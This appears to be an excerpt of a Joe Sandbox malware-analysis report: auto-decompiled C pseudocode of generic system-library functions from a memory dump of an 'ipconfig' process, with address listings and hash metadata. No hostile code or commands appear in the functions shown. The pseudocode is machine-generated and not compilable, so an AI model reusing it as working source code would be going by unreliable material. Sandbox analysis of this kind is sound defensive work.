							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E02EDB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































              0x02f43d40
              0x02f43d48
              0x02f43d52
              0x02f43d59
              0x02f43d5d
              0x02f43d61
              0x02f43d63
              0x02f43d67
              0x02f43d69
              0x02f43d72
              0x02f43d76
              0x02f43d7a
              0x02f43d7f
              0x02f43d8b
              0x02f43d91
              0x02f43d91
              0x02f43d91
              0x02f43d94
              0x02f43d96
              0x02f43d9d
              0x02f43da1
              0x02f43db0
              0x02f43dba
              0x02f43dbc
              0x02f43dbc
              0x02f43dc6
              0x02f43dcb
              0x02f43dcf
              0x02f43dd1
              0x02f43dd4
              0x00000000
              0x00000000
              0x02f43dd9
              0x02f43e0c
              0x02f43e0c
              0x02f43e0f
              0x02f43ddb
              0x02f43ddb
              0x02f43de0
              0x00000000
              0x02f43de2
              0x02f43de2
              0x02f43de4
              0x02f43de8
              0x02f43deb
              0x02f43df1
              0x00000000
              0x02f43df3
              0x02f43df3
              0x02f43df5
              0x02f43df8
              0x02f43dfa
              0x00000000
              0x02f43dfa
              0x02f43df1
              0x02f43de0
              0x02f43e11
              0x02f43e11
              0x00000000
              0x02f43dfe
              0x02f43e04
              0x02f43e06
              0x00000000
              0x02f43e06
              0x00000000
              0x02f43e04
              0x02f43d91
              0x02f43e15
              0x02f43e1a
              0x02f43e1f
              0x02f43e1f
              0x02f43e23
              0x02f43e29
              0x00000000
              0x00000000
              0x02f43e2e
              0x00000000
              0x02f43e30
              0x02f43e30
              0x02f43e35
              0x00000000
              0x02f43e37
              0x02f43e3e
              0x02f43e42
              0x02f43e48
              0x02f43e4e
              0x00000000
              0x02f43e4e
              0x02f43e35
              0x00000000
              0x02f43e2e
              0x02f43e5b
              0x02f43e5c
              0x02f43e5d
              0x02f43e68
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 08bcd6d1f677a07777a157392c7d9366d2de49b6642e094b6719f1f4b7852cea
              • Instruction ID: 258312eb657f60cbebe3a4e9d4cae6d25f70de2e80230cf3ffbdb8bc290c807f
              • Opcode Fuzzy Hash: 08bcd6d1f677a07777a157392c7d9366d2de49b6642e094b6719f1f4b7852cea
              • Instruction Fuzzy Hash: F4316871946305DFCB10DF14C88055ABFE1BF85684F5589AEF5998B240DB70D908CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECA70E Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E02ECA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x2f87b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x2f87b10 = 8;
					 *0x2f87b14 = 0x2f87b0c;
					 *0x2f87b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E02ECA990(0x2f87b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L02ECA840(__edx, __ecx, __ecx, _t52, 0x2f87b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x2f87b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x2f87b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x2f87b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L02EB4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x2f87b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E02EDF3E0(_t50,  *0x2f87b14, _t8 >> 3);
						_t28 =  *0x2f87b14; // 0x77ad7b0c
						__eflags = _t28 - 0x2f87b0c;
						if(_t28 != 0x2f87b0c) {
							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x2f87b14 = _t50;
						_t48 = _v12;
						 *0x2f87b10 = _t9;
						goto L6;
					}
					 *0x2f87b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















              0x02eca713
              0x02eca714
              0x02eca717
              0x02eca71d
              0x02eca720
              0x02eca722
              0x02eca727
              0x02eca74a
              0x02eca754
              0x02eca75e
              0x02eca768
              0x02eca76a
              0x02eca773
              0x02eca78b
              0x02eca790
              0x02eca792
              0x02eca741
              0x02eca741
              0x02eca743
              0x02eca749
              0x02eca749
              0x02eca732
              0x02eca73a
              0x02eca797
              0x02eca79d
              0x02eca7a3
              0x02eca7a9
              0x02eca7b6
              0x02eca7bc
              0x02eca7ca
              0x02eca7e0
              0x02eca7e2
              0x02eca7e4
              0x02f09bf2
              0x00000000
              0x02f09bf2
              0x02eca7ed
              0x02eca7f2
              0x02eca800
              0x02eca805
              0x02eca80d
              0x02eca812
              0x02f09c08
              0x02f09c08
              0x02eca818
              0x02eca81b
              0x02eca821
              0x02eca824
              0x00000000
              0x02eca824
              0x02eca7ae
              0x00000000
              0x02eca7ae
              0x02eca73c
              0x02eca73e
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1b6b18b7f7f57c95717258fdc5f2e3664603d50511c768609930a65d5b9920e7
              • Instruction ID: 32b4ee7be40b754897980e8bc3f927d7503568a4cc0ce6d30969feb658356e95
              • Opcode Fuzzy Hash: 1b6b18b7f7f57c95717258fdc5f2e3664603d50511c768609930a65d5b9920e7
              • Instruction Fuzzy Hash: CC31D0B9A802089BC711EF58DD90F69F7FAFB84798F248D69E11587344D3709912CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02E9AA16 Relevance: .1, Instructions: 93COMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E02E9AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x2f8d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x2f87b9c; // 0x0
					_t53 = L02EB4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E02EDB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E02EDF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L02EA6C59(_t53, _t51, _t58) != 0) {
							_t28 = E02EC5E50(0x2e7c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E02ECB230(_v32, _v28, 0x2e7c2d8, 1,  &_v24);
								_t28 = E02E9F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















              0x02e9aa25
              0x02e9aa29
              0x02e9aa2d
              0x02e9aa30
              0x02e9aa37
              0x02e9aa3c
              0x02ef4458
              0x02ef4458
              0x02ef4472
              0x02ef4474
              0x02ef4476
              0x02e9aa64
              0x02e9aa74
              0x02ef447c
              0x02ef4483
              0x02ef4492
              0x02e9aa52
              0x02e9aa54
              0x02e9aa5e
              0x02ef44a8
              0x02ef44ad
              0x02ef44af
              0x02ef44b6
              0x02ef44b6
              0x02ef44b9
              0x02ef44bc
              0x02ef44cd
              0x02ef44d3
              0x02ef44d6
              0x02ef44e1
              0x02ef44e1
              0x02ef44e6
              0x02ef44e8
              0x02ef44fb
              0x02ef44fb
              0x02ef44e8
              0x00000000
              0x02e9aa5e
              0x02ef4476
              0x02e9aa42
              0x02e9aa46
              0x02e9aa48
              0x02e9aa4c
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe922660f88236cbff89e8ad481131adbe227020d811380b3e1894d8de067b62
              • Instruction ID: 0cb931c9aed29e35ce5d2b3f06845f947b8751db5a41ab94647497bd95fac96b
              • Opcode Fuzzy Hash: fe922660f88236cbff89e8ad481131adbe227020d811380b3e1894d8de067b62
              • Instruction Fuzzy Hash: 5A31F571A80219ABDF11EF64CD81ABFB3B9EF04704F11946AF905EB290E7749D11CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC61A0 Relevance: .1, Instructions: 93COMMON
              Download Yara Rule
              C-Code - Quality: 97%
              			E02EC61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E02EC5E50(0x2e767cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E02F69D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E02E9F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















              0x02ec61b3
              0x02ec61b5
              0x02ec61bd
              0x02ec61c3
              0x02ec61c7
              0x02ec61d2
              0x02ec61ff
              0x02ec61ff
              0x02ec6201
              0x02ec6207
              0x02ec6207
              0x02ec61d4
              0x02ec61d9
              0x00000000
              0x00000000
              0x02ec61df
              0x02ec61e2
              0x00000000
              0x00000000
              0x02ec61e6
              0x02ec61e8
              0x02ec61ee
              0x02ec61ee
              0x02ec61f9
              0x02f0762f
              0x02f07632
              0x02f07635
              0x02f07639
              0x02f07640
              0x02f0766e
              0x02f07675
              0x00000000
              0x00000000
              0x02f07681
              0x02f07689
              0x02f0768d
              0x02f07691
              0x02f07695
              0x02f07699
              0x02f076af
              0x02f076b5
              0x02f076b7
              0x02f076b7
              0x02f076d7
              0x02f076dc
              0x00000000
              0x02f076dc
              0x02f076a2
              0x02f076a9
              0x02f07651
              0x02f07653
              0x02f07653
              0x02f07656
              0x02f07656
              0x00000000
              0x02f07656
              0x02f07644
              0x02f07646
              0x02f07648
              0x02f07648
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5192519c0a8377e5a0babe794a568242200aad199824d2e94b3c4a6f558d3891
              • Instruction ID: 185181f711579e66c411230efa2deb7819c697cf21f88c8c220a8f49f0f8eeb2
              • Opcode Fuzzy Hash: 5192519c0a8377e5a0babe794a568242200aad199824d2e94b3c4a6f558d3891
              • Instruction Fuzzy Hash: FB31A071A057018FD720DF59C940B27F7E9FB88B44F14896DE99997391D770E804CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED4A2C Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E02ED4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x2f8d360 ^ _t62;
				_v8 =  *0x2f8d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E02EB2280(_t26, 0x2f88608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E02EAFFB0(_t41, _t51, 0x2f88608);
						L2:
						 *0x2f8b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E02EDB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E02EB2280(_t28, 0x2f88608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E02EAFFB0(_t42, _t53, 0x2f88608);
							if(_t53 != 0) {
								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E02EAFFB0(_t41, _t51, 0x2f88608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























              0x02ed4a2c
              0x02ed4a34
              0x02ed4a3c
              0x02ed4a3e
              0x02ed4a48
              0x02ed4a4b
              0x02ed4a4d
              0x02ed4a51
              0x02ed4a9c
              0x00000000
              0x00000000
              0x02ed4aa3
              0x02ed4aa8
              0x02ed4aad
              0x02ed4ab1
              0x02ed4ade
              0x02ed4ae3
              0x02ed4a5a
              0x02ed4a62
              0x02ed4a6a
              0x02ed4a6e
              0x02f0f203
              0x02ed4a84
              0x02ed4a88
              0x02ed4a89
              0x02ed4a8a
              0x02ed4a95
              0x02ed4a95
              0x02ed4a79
              0x02ed4a80
              0x02ed4af2
              0x02ed4af4
              0x02ed4af9
              0x02ed4aff
              0x02ed4b01
              0x02ed4b03
              0x02ed4b08
              0x02f0f20a
              0x02f0f212
              0x02f0f216
              0x02f0f216
              0x02ed4b08
              0x02ed4b13
              0x02ed4b1a
              0x02f0f229
              0x02f0f229
              0x02ed4b1a
              0x02ed4a82
              0x00000000
              0x02ed4a82
              0x02ed4ab7
              0x02ed4acd
              0x02ed4acd
              0x02ed4ad5
              0x02ed4ada
              0x00000000
              0x02ed4ada
              0x02ed4ac2
              0x02ed4acb
              0x00000000
              0x00000000
              0x00000000
              0x02ed4acb
              0x02ed4a53
              0x02ed4a53
              0x02ed4a58
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dcc160a832516943df0d2b878743f791eef5fc261db3c76eca55736663ec876b
              • Instruction ID: 2cb3ad7d20f97ed47bba2107b4d575c23d630fe7fc6167bc9208f8f72feaf9cb
              • Opcode Fuzzy Hash: dcc160a832516943df0d2b878743f791eef5fc261db3c76eca55736663ec876b
              • Instruction Fuzzy Hash: 473134326813509FDB31AF14C980B2AF7E5FF94748F40A529E9564B680EB70E801DF85
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ED8EC7 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E02ED8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x2f8d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E02EC4E70(0x2f886e4, 0x2ed9490, 0, 0);
					if( *0x2f853e8 > 5 && E02ED8F33(0x2f853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x2f853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x2f853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x2e7bc46;
						_t48 = E02F17B9C(0x2f853e8, 0x2e7bc46, _t67, 0x2f853e8, _t70,  &_v140);
					}
				}
				return E02EDB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































              0x02ed8ec7
              0x02ed8ed9
              0x02ed8edc
              0x02ed8ee6
              0x02ed8ee9
              0x02ed8eee
              0x02ed8efc
              0x02ed8f08
              0x02f11349
              0x02f11353
              0x02f1135d
              0x02f11366
              0x02f1136f
              0x02f11375
              0x02f1137c
              0x02f11385
              0x02f11390
              0x02f11391
              0x02f1139c
              0x02f1139d
              0x02f113a6
              0x02f113ac
              0x02f113b2
              0x02f113b5
              0x02f113bc
              0x02f113bf
              0x02f113c2
              0x02f113c5
              0x02f113c8
              0x02f113cb
              0x02f113ce
              0x02f113d1
              0x02f113d4
              0x02f113d7
              0x02f113da
              0x02f113dd
              0x02f113e0
              0x02f113e3
              0x02f113e6
              0x02f113e9
              0x02f113f6
              0x02f11400
              0x02f11400
              0x02ed8f08
              0x02ed8f32

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff24cc9ecddc5a028ec37eb457eb6a21a15fb01df8bcc8093010df3ce1ff910c
              • Instruction ID: 5d0a1be70a963b824b8df3daf7364d17da459e35b41e8c22d373eeca80022daa
              • Opcode Fuzzy Hash: ff24cc9ecddc5a028ec37eb457eb6a21a15fb01df8bcc8093010df3ce1ff910c
              • Instruction Fuzzy Hash: 5541A1B1D4031C9FDB24CFAAD980AAEFBF5BB48300F9081AEE519A7640D7705A45CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02ECE730 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E02ECE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E02ED9670() < 0) {
					L02EEDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x2f87b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L02EB4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M02ECE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















              0x02ece730
              0x02ece736
              0x02ece738
              0x02ece73d
              0x02ece73e
              0x02ece740
              0x02ece749
              0x02ece765
              0x02ece76a
              0x02ece76b
              0x02ece76c
              0x02ece76d
              0x02ece76e
              0x02ece76f
              0x02ece775
              0x02ece777
              0x02ece77e
              0x02f0b675
              0x02ece784
              0x02ece784
              0x02ece789
              0x02ece7a8
              0x02ece7ac
              0x02ece807
              0x02ece7ae
              0x02ece7ae
              0x02ece7b1
              0x02ece7b4
              0x02ece7b9
              0x02ece7c0
              0x02ece7c4
              0x02ece7ca
              0x02ece7cc
              0x00000000
              0x02ece7d3
              0x02ece7d6
              0x00000000
              0x00000000
              0x02ece7ff
              0x02ece802
              0x00000000
              0x00000000
              0x02ece7f9
              0x02ece7fc
              0x00000000
              0x00000000
              0x02ece7f3
              0x02ece7f6
              0x00000000
              0x00000000
              0x02ece7ed
              0x02ece7f0
              0x00000000
              0x00000000
              0x02ece7e7
              0x02ece7ea
              0x00000000
              0x00000000
              0x02f0b685
              0x02f0b688
              0x00000000
              0x00000000
              0x02f0b682
              0x00000000
              0x00000000
              0x02ece7cc
              0x02ece7d9
              0x02ece7dc
              0x02ece7de
              0x02ece7de
              0x02ece7ac
              0x02ece7e4
              0x02ece74b
              0x02ece751
              0x02ece759
              0x02ece761
              0x02ece761

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3bb6625b54479edd0336bc316a4d7b65765757384481d863d8d84ce4284b5580
              • Instruction ID: 4430905e66c28aeb9cf6a646554048fecb46d60a2167e74ba5b7c25ed480c1b0
